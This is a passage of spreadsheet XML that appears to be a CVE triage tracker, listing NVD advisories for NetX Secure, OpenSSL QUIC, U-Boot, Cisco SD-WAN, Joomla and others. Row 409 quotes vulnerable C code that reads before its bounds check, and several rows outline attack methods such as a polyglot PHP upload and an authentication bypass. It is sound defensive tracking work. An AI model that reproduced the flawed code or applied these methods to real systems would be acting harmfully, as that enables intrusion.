      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>Two client-side TLS/DTLS handshake parsers in NetX Secure read fields from a server-supplied message before validating that the message is long enough to contain them. Both are bounded out-of-bounds reads on a remotely reachable path, both are reached from a TLS or DTLS client connecting to a malicious or malformed server, and both have the same shape: the bounds check exists and returns the correct status, but it runs after the read it is meant to guard.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102728</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102758</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>The `_nx_secure_x509_asn1_tlv_block_parse()` function parses ASN.1 TLV (tag-length-value) blocks out of DER-encoded data. It is the primitive underneath all X.509 certificate parsing in NetX Secure, and therefore runs on certificates supplied by a remote peer during the TLS handshake.
The function reads the one-byte ASN.1 tag from the caller's buffer *before* checking that the buffer holds at least one byte. When a caller passes a remaining length of zero, the guard correctly returns `NX_SECURE_X509_ASN1_LENGTH_TOO_LONG`, but the read has already happened one byte past the end of the buffer.
code:
nx_secure/src/nx_secure_x509_asn1_tlv_block_parse.c
```
UINT _nx_secure_x509_asn1_tlv_block_parse(const UCHAR *buffer, ULONG *buffer_length, USHORT *tlv_type,
                                          USHORT *tlv_tag_class, ULONG *tlv_length,
                                          const UCHAR **tlv_data, ULONG *header_length)
{
UINT   current_index;
USHORT current_tag;
ULONG  length;
ULONG  length_bytes;
    current_index = 0;
    current_tag = buffer[current_index];      /* &lt;-- read before the bounds check */
    if (*buffer_length &lt; 1)
    {
        return(NX_SECURE_X509_ASN1_LENGTH_TOO_LONG);
    }
```
The remainder of the function is correctly ordered. The multi-byte length path is guarded by `length_bytes &gt; 4 || length_bytes &gt; *buffer_length` before its read loop, the decoded value is checked against `length &gt; *buffer_length`, and the second single-byte length read follows its own `*buffer_length &lt; 1` guard. The tag read is the only load placed ahead of its check.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102758</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54873</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>Issue summary: QUIC process may keep memory for QUIC packet
buffer for much longer period than necessary.
Impact summary: Remote peer can exploit this vulnerability
by sending maliciously crafted packets, making the local
QUIC stack to keep the memory for packet buffers allocated.
The time for which the memory remains allocated is entirely
under the control of the potentially malicious remote peer.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: To save copy operation from the packet buffer to the
stream reassemble buffer the QUIC stack leaves the stream data
on the packet buffer waiting to be copied to a buffer provided
by the local receiving application. The QUIC stack releases
a reference to the packet buffer only after the data are copied
to the application buffer. This design is more efficient for
legitimate data transfers but enables an attacker to allocate a lot
more memory than actually required by the data kept in the receiving
stream buffer.
To mitigate the vulnerability, the QUIC stack now calculates
and monitors memory overhead for every stream. The memory overhead
for a single stream frame is calculated as a difference between the
size of the whole packet that carries the stream frame and the size
of the stream frame itself. The memory overhead for a single stream
frame is added to the total (cumulative) memory overhead QUIC stack
keeps for each stream. Once the cumulative memory overhead exceeds
64kB, the QUIC stack moves the stream frame data from the packet
buffer to the stream buffer, starting with the next packet received.
FIPS impact: no
The FIPS module is not affected as the QUIC implementation is outside of
the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54873</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S411"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411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S412"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412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S413"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413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S414"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414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S415"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415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100288</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Cleartext storage of sensitive information in the database in Devolutions Server 2026.3.5.0 and earlier allows an attacker with read access to the database to obtain external identity provider tokens and active session identifiers via direct inspection of stored records.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100288</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103054</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions before 12.0.0 contain an authorization bypass vulnerability in the MSSP module that allows authenticated users to add arbitrary tenants to portfolios they own. Attackers can submit tenant UUIDs via the add_tenants_to_portfolio endpoint to claim unclaimed tenants and read their security alerts, incidents, and posture metrics without consent.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103054</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74225</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains out-of-bounds memory access in dhcp6_parse_options() that fails to validate SERVERID and CLIENTID option lengths from DHCPv6 packets. Attackers on the local network can send crafted DHCPv6 ADVERTISE or REPLY packets during netboot to corrupt memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74225</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T418"/>
  <conditionalFormatting sqref="E2:E41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1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8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CVE-2026-76504</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:catalyst_sd-wan_manager</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-10-03</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-177</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the API session-based authentication management of Cisco Catalyst SD-WAN Manager could allow an unauthenticated, remote attacker to access an affected system with privileges of the admin user.
This vulnerability is due to improper handling of URI encoding in an HTTP request, which allows the request to bypass an authentication rule that is intended to restrict access to a specific API endpoint. An attacker could exploit this vulnerability by sending a crafted HTTP request to the API of the affected system. A successful exploit could allow the attacker to bypass authentication and gain access to the API as the admin user.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76504</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102427</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S3" s="5"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the uploaded file’s content with a real magic-byte MIME check, but the extension allow-list that would otherwise restrict the saved file’s extension was present in the source and commented out. The saved file’s extension was taken directly from the attacker-supplied filename with no validation, and the file was written to a path directly under the Joomla web root that is executed by the PHP handler. An image/PHP polyglot, a file whose header bytes satisfy the MIME check with PHP source appended after, passed the content check while carrying a .php extension of the attacker’s choosing.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102427</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55107</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Kobako is a Ruby gem that embeds a Wasm-isolated mruby interpreter inside applications, allowing execution of untrusted Ruby scripts (LLM-generated code, user formulas, student submissions, third-party plugins) in-process without giving them access to host memory, files, network, or credentials. From version 0.1.0 to before version 0.9.1, a guest mruby script running inside the Kobako sandbox can execute arbitrary Ruby in the host process, fully escaping the sandbox. This issue has been patched in version 0.9.1.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55107</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100512</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Nested Pages &lt;= 3.3.2 versions.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100512</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55494</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.4, Tugtainer Agent allows unauthenticated access to Docker management APIs when AGENT_SECRET is not configured. The Agent uses request signatures to protect its API routes. However, in agent/auth.py, the signature verification function returns successfully if Config.AGENT_SECRET is empty. This causes protected Agent APIs to become accessible without authentication. This issue has been patched in version 1.30.4.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55494</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
